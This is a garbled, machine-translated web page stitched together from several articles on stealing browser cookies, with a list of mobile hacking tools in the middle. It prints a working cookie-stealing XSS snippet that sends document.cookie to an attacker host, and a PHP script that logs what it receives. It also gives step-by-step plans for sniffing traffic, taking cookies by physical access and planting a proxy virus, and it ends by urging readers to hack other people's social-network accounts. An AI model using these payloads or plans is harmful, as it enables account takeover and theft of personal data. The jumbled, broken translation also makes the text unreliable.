How to intercept cookies files. Methods of stealing cookies files. Physical access to data
Have you ever thought about how to personalize visitors on some Web nodes? This can be expressed, for example, in memorizing the contents of the "trolley" (if this node is intended for sale of goods) or in the method of filling the fields of some form. In the HTTP protocol underlying the functioning of the World Wide Web, there are no means that allow you to track events from one visit to the node to another, so a special addition was developed for the possibility of storing such "states". This mechanism described in the RFC 2109 document provides insertion into the transmitted queries and responses of HTTP special cookies data that allows WEB nodes to track their visitors.
Cookie data can be memorized for communication session time ( pER SESSION.), remaining in RAM during one session and removing when closing the browser, or even after the specified period of time expires. In other cases, they are permanent ( persistent.), remaining on the user's hard disk as a text file. Usually they are stored in the Cookies catalog (% WINDIR% \\ Cookies - in Win9x and% UserProfile% \\ Cookies - in NT / 2000). It is not difficult to guess that after capturing the cookie files in the Internet, the hacker can produce itself for the user of this computer, or collect important information contained in these files. After reading the following sections, you will understand how easy it is to do.
Interception of cookies files
The most direct way is to intercept cookies when transmitting them over the network. The intercepted data can then be used when entering the appropriate server. Such a task can be solved using any package interception utility, but one of the best is the Nikula Lawrence program ( Laurentiu Nicula.) SpyNet / Peepnet. SpyNet includes two utilities that work in the complex. Program Capturenet. Performs the capture of the package itself and saves it on the disk, and the PEEPNet utility opens this file and converts it to a readable format. The following example is a fragment of the Restored PEEPNet Communication Session program during which the cookie file is used to authenticate and control access to the viewed pages (to save anonymity the names changed).
Get http://www.victim.net/images/logo.gif http / 1.0 accept: * / * referrer: http://www.victim.net/ host: www.victim.net cookie: jrunsessionid \u003d 96114024278141622; Cuid \u003d Torpm! zxtfrlrlpwtvfiseblahblah
The example shows a Cookie fragment placed in an HTTP request to the server. The most important field is cuid \u003d.which sets a unique identifier used when authenticating the user on a node www.victim.net. Suppose that after that the hacker visited the Victim.net node, received its own identifier and cookie (it is assumed that the node places cookie data not in virtual memory, but writes them on the hard disk). Then a hacker can open its own cookie file and replace the Cuid \u003d field identifier in it, taking it from the intercepted package. In this case, when entering the Victim.Net server, it will be perceived as a user whose cookies have been intercepted.
Program's ability Peepnet Play the entire session or its fragment makes it much easier to implement the attacks of this type. Use the button Go Get IT! You can re-extract the pages that were viewed by the user using its Cookie data intercepted by the CaptureNet program. In the PEEPNET utility dialog box, you can see information about someone accomplished orders. At the same time, cookie data was used for authentication, intercepted by the CaptureNet program. Pay attention to the frame located in the lower right corner of the dialog box with the communication session data, and on the string that follows the Cookie line. These cookies used in authentication.
This is a rather clever trick. In addition, utility Capturenet. It can provide a full traffic record in decrypted form, which is almost equivalent to the possibilities of professional class utilities, such as Network Associates, Inc. company Sniffer Pro However utility SpyNet. Even better - it can be free!
Countermeasures
The nodes in which cookies are used to authenticate and storing important identification data are used. One of the tools that help in ensuring protection is the KookaBurra Software Cookie Cookie program, which can be found on the Web site http://www.kburra.com/cpal.html. This software product can be configured so that warning messages are generated for the WEB-node attempts to use the cookie mechanism. At the same time, you can "look behind the scenes" and decide whether to allow these actions. Internet Explorer has a built-in cookie support mechanism. To activate it, start the Internet Panel Options on the Security tab, go to the Security tab, select the Internet Zone element, set the Custom Level mode and for constant and temporary cookies. Set the switch to Prompt. Setting the use of cookies in the Netscape browser is performed using the command. Edit\u003e Preferences\u003e Advanced And setting the WARN ME BEFORE ACCEPTING A COOKIE or DISABLE COOKIES (Fig. 16.3). Taking the cookie file, you need to check whether it was written to the disk, and lend whether the Web node collects information about users.
Visiting a node on which cookies serve to authenticate, you need to make sure that the initially reported name and password are encrypted at least using the SSL protocol. Then this information will appear in the PEEPNet program at least in the form of a simple text.
The authors would prefer to completely abandon cookies if many often visited Web nodes did not require this mode. For example, Microsoft's Hotmail service has a cookie for registration worldwide. Since this service in the authentication process involves several different servers, then adding them to the zone of reliable nodes is not so simple (this process is described in the section "Reasonable use of security zones: a general solution to the problem of ActiveX elements"). In this case, the designation * .hotmail.com will help. Cookies are far from the perfect solution to the problem of incompleteness of the HTML protocol, however, alternative approaches appear to be even worse (for example, adding an identifier URL address that can be stored on Proxy servers). Until the idea appears better, the only output remains control over cookies using the methods listed above.
Capture cookies via URL
Imagine something terrible: Internet Explorer users click on specially designed hyperlinks and become potential victims, risking that their cookies will be intercepted. Bennet Hazelton ( Bennett Haselton.) and Jamie McCarthy ( Jamie McCarthy.) From the teenager organization PeaceFire, steady of freedom of communication via the Internet, published a scenario that embodies this idea to life. This script extracts cookies from a client computer if its user clicks on the link contained on this page. As a result, the contents of the cookie file becomes available for Web site operators.
This feature can be used in non-departious purposes by implementing the IFRAME descriptors to the HTML code of the Web page, the email in HTML format or messages from the newsgroup. In the following example, the proposed security counselor Richard M. Smith demonstrates the possibility of using the IFRAME descriptors together with the utility developed by Peacefire.
You can make a cunning e-mail that "captured" would cookie files from the user hard disk and transmitted them to the operators of the PeaceFire.org node. To do this, it is necessary to put a link to this node many times as shown in example. Despite the fact that the guys from Peacefire look pretty pleasant people, it is unlikely that someone will like it if confidential data fall into their hands.
Countermeasures
Install the update module that you can find at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. You can also use the program. Cookie Pal or built-in Internet Explorer features, as described above.
"Smartphone with hacker utilities? No such, "we would have recently told you. To run cairca, the usual tools for implementing attacks could only be on any Maemo. Now, many familiar tools ported under iOS and Android, and some Hack Tulza were specially written for mobile surroundings. Can a smartphone replace a laptop in penetration tests? We decided to check.
Android
Android is a popular platform not only for ordinary mortals, but also for the right people. The number of useful] [- the utilities here simply rolls. For this, you can say thanks to Unix-roots of the system - it has greatly simplified porting many tools on Android. Alas, some of them Google does not allow the Play Store, so you have to put the appropriate APK manually. Also, for some utilities, you need maximum access to the system (for example, IPTables firewall), so you should take care of root-access in advance. For each manufacturer, its own technology is used here, but simply finds the necessary instructions. A good set of HOWTO has collected Lifehacker resource (bit.ly/ewgdlu). However, if some model failed here, it always comes to the help of XDA-developers (www.xda-developers.com), where you can find various information in fact according to any Android-phone model. One way or another, part of the described utilities will earn and without root access.Package Manager
Botbrew Let's start a review from an unusual package manager. Developers call it "utilities for superupers", and it is not far from the truth. After installing BotBrew, you get a repository where you can download a huge amount of android compiled tools. Among them: Python and Ruby Interpreters to launch numerous tools that are written on them, TCPDUMP sniffer and NMAP scanner for network analysis, Git and Subversion to work with version control systems and much more.Network scanners
PIPS.![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_PIPS.jpg)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Fing.jpg)
![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Net_Tools.jpg)
![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Net_Tools.jpg)
Manipulation with traffic
Shark for root.![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Shark.png)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_FaceNIFF.jpg)
![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_DroidSheep.jpg)
![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Network_Spoofer.png)
![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_ANTI.jpg)
Traffic tunneling
Total Commander.![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/Android_TotalCommander.jpg)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_SSH_Tunnel.jpg)
Wireless networks
WiFi Analyzer The built-in wireless network manager does not differ in informative. If you need to quickly get a full picture of the number of access points, then the WiFi Analyzer utility is a great choice. It will not only show all the access points nearby, but also displays the channel on which they work, their MAC address and, which is most importantly used by the type of encryption (seeing the cherished letters "WEP", we can assume that access to the protected network is provided ). In addition, the utility is ideal if you need to find where the desired access point is physically located, thanks to the visual indicator of the signal level. Wifikill This utility, as its developer declares, can be useful when a wireless network is clogged with customers who use the entire channel, namely at this moment you need a good connection and a stable connection. Wifikill allows you to disable customers from the Internet as selectively and on a specific criterion (for example, it is possible to press over all the apples). The program of all-going to the ARP Spoofing attack and redirects all customers to themselves. This algorithm to stupidity is simply implemented on the basis of IPTables. Such a control panel for fast-powded wireless networks :).Web Application Audit
Http Query Builder.![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_HTTP_Query_Builder.jpg)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_RouterBruteForceADS.jpg)
![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_AnDOSid.jpg)
Different usefulness
Encode.![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_Encode.png)
Remote access
ConnectBot Having access to a remote host, you need to be able to use it. And for this you need customers. Let's start with SSH, where the standard de facto is already ConnectBot. In addition to the user-friendly interface, it provides the ability to organize protected tunnels via SSH connections. PocketCloud Remote RDP / VNC![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/Android_PocketCloud-Remote.jpeg)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/ANDROID_SNMP_MIB_Browser.jpg)
iOS.
No less popular among the developers of the Security-utilities platform iOS. But if in the case of Android root rights, they needed only for some applications, then on devices from Apple jailbreak almost always. Fortunately, even for the latest firmware of Ideevis (5.1.1) there is already a Toolz for jailbreak. Together with full access, you still get an alternative Cydia application manager, which has already contained many utilities.Work with the system
Mobileterminal![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_MobileTerminal-187x280.jpg)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/iOS_iSSH.png)
Data interception
PIRNI & PIRNI PRO![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/iOS_Pirni-187x280.png)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Intercepter-NG-249x280.jpg)
![](https://i2.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Ettercap-NG1-187x280.png)
Analysis of wireless networks
WiFi Analyzer![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_WiFI-Analyzer-187x280.jpg)
Network scanners
SCANY Which program uses any feeder at any point of the planet regardless of the purposes and tasks? Network scanner. And in the case of iOS, it is likely to be the most powerful SCANY tulk. Thanks to the set of embedded utilities, you can quickly get a detailed picture of network devices and, for example, open ports. In addition, the package includes network test utilities, such as Ping, Traceroute, NSlookup. Fing However, many prefer Fing. The scanner has a fairly simple and limited functionality, but it is quite enough for the first acquaintance with the network, say, cafeteria :). The results displays information about available services on remote machines, MAC addresses and host names connected to the scanned network. Nikto would seem to have forgotten about Nikto, but why? After all, this web scanner of vulnerability written in the script language (namely on Perl), you can easily install through Cydia. And this means that you can easily run it on your jailbreak device from the terminal. Nikto will gladly provide you with additional information on the web resource test. In addition, you can add your own signatures to your knowledge database with your own hands. SQLMAP This powerful tool for automatic operation of SQL vulnerabilities is written in Python, and therefore setting the interpreter, they can be used without any problems directly from the mobile device.Remote control
SNMP Scan.![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_SNMP-Scan.jpg)
![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_iTap_Mobile_RDP.jpg)
Password recovery
Hydra.![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Hydra-187x280.jpg)
![](https://i1.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_PassMule.jpg)
Operation of vulnerabilities
Metasploit.![](https://i0.wp.com/xakep.ru/wp-content/uploads/2014/12/IOS_Metasploit.png)
Cookies (Cookies) - Information as a text file, saved on the user's computer website. Contains authentication data (login / password, ID, phone number, mailbox address), user settings, access status. Stored in the browser profile.
Hacking cookies - This is theft (or "hijacking") session of the visitor web resource. The closed information becomes available not only to the sender and the recipient, but also a third party - a person to the interception.
Tools and methods of hacking cookies
Computer thieves, like their colleagues in real life, in addition to skills, skills, and knowledge, of course, have their own tools - a kind of arsenal of bastards and probe. We will get acquainted with the most popular hectares of hackers, which they use to learn cookies from the Internet masters.
Sniffiers
Special programs for tracking and analyzing network traffic. Their name comes from the English verb "Sniff" (sniff), because In the literal sense, the words "sniff" transmitted packets between nodes.
But the intruders with the help of a sniffer are intercepting session data, messages and other confidential information. The objects of their attacks become mainly unprotected networks, where cookies are sent in an open HTTP session, that is, practically not encrypted. (Public Wi-Fi is most vulnerable in this regard.)
To embed a sniffer to the Internet channel between the user node and the web server, the following methods are used:
- "Listening to" network interfaces (hubs, switches);
- branch and copy traffic;
- connection to the rupture of the network channel;
- analysis by means of special attacks, redirecting the traffic of sacrifice for a sniffer (Mac Spoofing, IP Spoofing).
XSS abbreviation means Cross Site Scripting - cross-site scripting. It is applied to the attack on websites for the purpose of kidnapping user data.
The principle of XSS is as follows:
- an attacker introduces malicious code (special disguised script) on the website of the site, the forum or to the message (for example, when correspondent in the social network);
- the victim enters the infected page and activates the established code on its PC (clicks, transfers by reference, etc.);
- in turn, the fastening code "retrieves" confidential user data from the browser (in particular, cookies) and sends them to the attacker's web server.
In order to "enlist" the program XSS mechanism, hackers use all sorts of vulnerabilities in web servers, online services and browsers.
All XSS vulnerabilities are divided into two types:
- Passive. The attack is obtained by a request to a specific web page script. Malicious code can be entered into various forms on a web page (for example, in the site search string). Most susceptible to passive XSS resources on which there is no dataset filtering HTML tags;
- Active. Located directly on the server. And driven in the victim's browser. Actively used by fraudsters in all sorts of blogs, chat rooms and news feeds.
Hackers carefully "camouflage" their XSS scripts so that the victim does not suspect anything. Change the extension of the files, give the picture code, motivated to go through the link, attract an interesting content. As a result: the PC user who did not comply with his own curiosity, his own hand (click of the mouse) sends cookies of the session (with a login and password!) The author of the XSS script is a computer villain.
Cook substitution
All cookies are saved and sent to the web server (from which they "came") without any changes - in pristine form - with the same values, rows and other data. A deliberate modification of their parameters is called Cook Rezy. In other words, when changing cookies, an attacker issues the desired for valid. For example, when making a payment in the online store, the amount of payment changes in the cookie in a smaller side - thus the "savings" on purchases occurs.
Stolen cookies of the session in the social network with someone else's account "are published" to another session and on another PC. The owner of the stolen cook receives full access to the victim's account (correspondence, content, page settings) until it is on its page.
Cook editing is carried out using:
- functions "Cookies ..." in Opera browser;
- addon Cookies Manager and Advanced Cookie Manager for Firefox;
- iECookiesView utilities (Internet Explorer only);
- aKELPAD text editor, NotePad or Windows Notepad.
Physical access to data
A very simple implementation scheme consists of several steps. But effective only if the computer of the victim with an open session, such as VKontakte, was left unattended (and enough for long!):
- The JavaScript feature that displays all saved cookies is entered into the browser's address bar.
- After pressing "Enter", they all appear on the page.
- Cookies are copied, stored in a file, and then transferred to the USB flash drive.
- On another PC, the Cookie substitution is carried out in a new session.
- Access to the account of the victim.
As a rule, hackers use the above tools (+ others) both in the complex (since the level of protection on many web resources is high enough) and individually (when users exert excessive naiveness).
Xss + sniffer
- A XSS script is created, which indicates the address of the Sniffera-online (own manufacture or a specific service).
- Malicious code is saved with extension.img (image format).
- Then this file is loaded to the site page, in chat, or in a private message - where an attack will be carried out.
- The user's attention is drawn to the created "trap" (social engineering is already entering into force).
- If the "trap" works, cookies from the browser victims are intercepted by a sniffer.
- The hacker opens the Sniffer logs and removes abducted cookies.
- Next performs the substitution to obtain the rights of the account owner through the above tools.
Cookies protection from hacking
- Use the encrypted connection (using appropriate protocols, and methods of ensuring).
- Do not respond to dubious links, pictures, tempting offers to get acquainted with "new free software." In particular, unfamiliar people.
- Use only trusted web resources.
- Finish an authorized session by pressing the "Exit" button (and not just close the tab!). Especially if the entry into account was not executed from a personal computer, but, for example, with a PC in an Internet cafe.
- Do not use the "Save Password" browser feature. Saved registration data increase the risk of theft at times. Do not be lazy, do not regret a few minutes of time to enter the password and login at the beginning of each session.
- After web surfing - visits to social networks, forums, chat rooms, sites - remove saved cookies and clean the browser cache.
- Regularly update browsers and antivirus software.
- Use browser extensions protecting from XSS attacks (for example, Noscript for FF and Google Chrome).
- Periodically in accounts.
And most importantly - do not lose vigilance and attention during rest or work on the Internet!
What is the same cookie?
There is a mechanism that allows the HTTP server to save some text information on the user's computer, and then contact it. This information is called Cookie. In essence, each cookie is a pair: the name of the parameter and its value. Also, each cookie is assigned a domain to which it belongs. For security reasons in all browsers, the HTTP server is allowed only to contact your domain cookie. Additionally, cookie may have a date of the expiration, then they will be stored on the computer to this date, even if you close all the browser windows.
Why is cookie important?
All Cookies are used to identify the user in all multiplayer cookies. Rather, the current user connection with the service, user session. If someone finds out your cookie, it will be able to log in on your behalf. Because at the moment there are very few Internet resources checks the change of the IP address for one user session.
How to change or replace cookie?
Browser developers do not provide built-in cookies editing. But you can do and the usual notebook (NotePad).
Step 1: Create a text file with text
Windows Registry Editor Version 5.00
@ \u003d "C: \\\\ IE_EXT.HTM"
Save it under the name IE_EXT.REG
Step 2: Using the created file, add changes to the Windows registry.
Step 3: Create a text file with text
<
script
language \u003d "javascript"\u003e
external.menuarguments.clipboarddata.setdata ("text", external.Menuarguments.document.cookie);
external.Menuarguments.Document.Cookie \u003d. "TestName \u003d TestValue; Path \u003d /; Domain \u003d testdomain.ru";
alert (external.Menuarguments.Document.Cookie);
script >
Save it under the name C: \\ IE_EXT.HTM
Step 4: Go to the website of interest to us.
Step 5: Right-click on the clicks on a free page and select the menu item "Working with cookies". Let me access the exchange buffer. The clipboard will get your cookie this site. You can insert them notebook (notepad) and see.
Step 6: To change some cookie, edit the file C: \\ IE_Ext.htm, replacing testName. in the name of Cookie, testValue. - on its meaning, testdomain.ru. - on the domain of the site. If necessary, add more similar lines. For convenience of control, I added to the script output of the current cookie before and after the change: alert (external.Menuarguments.Document.Cookie);
Step 7: Perform again step 5, and then we update the page.
Outcome: We will go to this Internet resource with updated cookies.
How to steal cookies with JavaScript?
If the attacker managed to find the ability to perform an arbitrary JavaScript script on the sacrifice computer, then read the current cookie it can be very easy. Example:
var str \u003d document.cookie;
But whether he can transfer them to his site, because, as I pointed out earlier, the JavaScript script will not be able to contact the site in another domain without further confirmation? It turns out that the JavaScript script can download any picture on any HTTP server. In this case, transmit any text information in the download request for this picture. Example: http://hackersite.ru/xss.jpg?text_info.Therefore, if you execute this code:
var img \u003d. new image ();
img.src \u003d. "http://hackersite.ru/xss.jpg?"+ Encodeuri (Document.Cookie);
then cookie will be in the request for downloading "pictures" and "leave" to an attacker.
How to process such requests to download "pictures"?
An attacker only needs to find hosting with PHP support and accommodate code there is similar to this:
$ UID \u003d URLDECODE ($ _ Server ["query_string"]);
$ FP \u003d Fopen ("Log.txt", "A");
FPUTS ($ FP, "$ UID \\ N");
FClose ($ FP);
?>
Then all query settings for this script will be stored in the file. log.txt. It remains only in the previously described JavaScript script replace http://hackersite.ru/xss.jpg. On the path to this php script.
Outcome
I showed only the easiest way to use XSS vulnerabilities. But this proves that the presence of at least one such vulnerabilities on a multiplayer website can allow an attacker to use its resources from your behalf.
Methods of stealing cookie files
Such a hacking method as cookies is perfect and used by many hackers. If you also want to try it, but do not know what to do, read our recommendations.
What is cookies?
This is the information about visiting the user of a particular site. It is stored in a separate text document. There you can find a different information. Including logins, passwords, postal mailbox addresses and phone numbers. That is why hackers seek to get these documents. To steal the necessary materials, hackers are resorted to different methods.
Methods of stealing cookies
XSS vulnerability
It can be found and used on any site. When a specialist finds a vulnerability, he introduces a special code into it. Depending on the purpose of the codes are different, they are written under a specific resource. When the user comes to this page and updates it, all changes are applied. Code Start act - it is embedded in the victim's computer and collects all the necessary information from the browser.
To make the code, you can use any type of vulnerabilities - an error on the web resource in the browser or computer system.
There are 2 types of XSS attacks:
Passive - Aims on the script page. In this case, you need to look for vulnerable places in the page elements. For example, tab with dialogs, search box, video catalog, etc.
Active - They should be signed on the server. Particularly often on various forums, blogs and chat rooms.
How to make a person apply XSS?
The task is not easy, because often to activate the code you want to click on the link with it. You can disguise the link and send in the letter along with an interesting offer. For example, to offer a big discount in the online store. You can also implement it all in the picture. The user is likely to watch it and will not suspect anything.
Installing Sniffera
This is the introduction of specialized programs for tracking traffic on someone else's device. Sniffer allows you to intercept transmitted sessions with other people's data. So you can get all the logins and passwords, addresses, any important information transmitted by the user. At the same time, attacks are most often carried out on unprotected HTTP data. For this, unprotected Wi-Fi is well suited.
You can implement Sniffer in several ways:
- Copy traffic;
- Data analysis using attacks on traffic;
- Listening to interfaces;
- Implementing a sniffer into channel break.
All data is stored on a web server in original form. If you change them, it will be considered a substitution. All materials obtained can be used on another computer. So you will receive full access to the user's personal data. You can modify cookies using settings in the browser, addons or special programs. Editing is also possible in any standard notebook on PC.
Cookies with virus
Specialists advise not to use cookies, if there is no special need for it. If it is possible to turn them off, it is better to do it. All because cookies are very vulnerable. They often steal attackers. From these files, you can get a huge number of personal confidential information that will be used against a person. The most dangerous view of the files - those that remain in the system when the session is already completed.
Cookies often steal with the help of a viral utility. It is done quite simple. A virus is introduced into any safe utility that collects certain materials on the computer. The viral program will be associated with the server of its host. The program must be configured so that the browser uses it as a proxy server.
When the prog falls on the victim's PC, it will automatically start collecting all stored data and send them to you.
Viruses are different, they may also differ. Some allow you to fully control the browser and view any information. Others are able to steal protected materials. Third collect only unprotected data.
You may have difficulty with the introduction of a viral program on someone else's computer. You must force the user to download it and run. Here you can either send him a letter with reference to the program, or give the program for a safe and wait, when a person himself crashes it from your site.
How to protect cookies Files from theft?
Most of the web resources are not protected enough. Hackers easily find vulnerabilities and errors on these platforms.
Cook protection rules:
- Bind the computer ID to the current session. Then, when entering the site from an extraneous device, a new session will be started, the data from the previous will not work.
- Tie a session to the browser. The same principle will work as in the previous paragraph.
- Encrypt the parameters transmitted over the network. Then the information saved in the document cannot be understood. It will be useless for who intercepted it. This reception will not protect you 100%, some experts know how to decipher any materials.
- Create a separate folder for the individuals.
How to find out the password from someone else's account through cookies?
To get other people's authorization data, you must first get to the file in which they were saved.
For those who use Mozilla Firefox, you need to go to the Tools tab, which is in the main menu. Next, in the system settings you will find the "Protection" section, there and you should look for all important information about accounts in social networks. All passwords are hidden, so click on the "Display" button. Immediately you can install protection and deliver a special code. Then no one except you get this information.
Opera for general viewing is available only by user names. But in the menu you can find the password manager and view all stored on the computer. Full list is in the manager. In order to access passwords, you need to install additional extension.
In Google Chrome, all these materials can be seen in the extended settings. There is a tab with all stored cookies.
Unfortunately, the Standard Internet Explorer browser does not have such functions. To find out information about web platforms, which visits the PC owner, you need to download a special program. On the Internet it can be found for free, it is completely safe, but it is better to load it from proven sources. Do not forget that any program must be checked by antivirus. This is especially true of those utilities that work with passwords.
This technique suits only those who have physical access to the victim's computer. You can also find out someone else's password if a person logged in on the platform through your PC and saved his data.
Programs for theft of cookie files
On the Internet there was a lot of hacker forumJD, on which hackers communicate with each other. People come there hoping to get free help. It is there that you can find a huge number of different programs for hacking. We want to warn you that you should not trust these programs. Utilities for remote stealing cookies from someone else's device - pacifiers, or viral programs. If you download this software to your PC, then most likely you will take a trap of the fraudster. Free Place Zhuliki Programs. Thus, they distribute viral software and receive control over other people's PCs. In general, such programs are divorce, you will understand this by their interface and content. If you are collecting how to use any software for mining files, then let it be sniffer. Of course, they are not so easy to use. Yes, and find a good sniffer on the Internet is not easy. But there is such a software from specialists who can sell it for money. Remember that scammers are a lot, everyone has their own tricks. Trying only to proven hackers who have a good reputation, there are reviews and there are our own website.
In conclusion, I would like to note that Cook's theft is a really powerful method, the effectiveness of which is very high. If you want to hack someone's profile in the social network or messenger, be sure to consider this option. Best of all this method works when you can use the sacrifice computer. It is much more difficult to get materials at a distance, but you can use our advice and try to apply this method in practice.
In chapter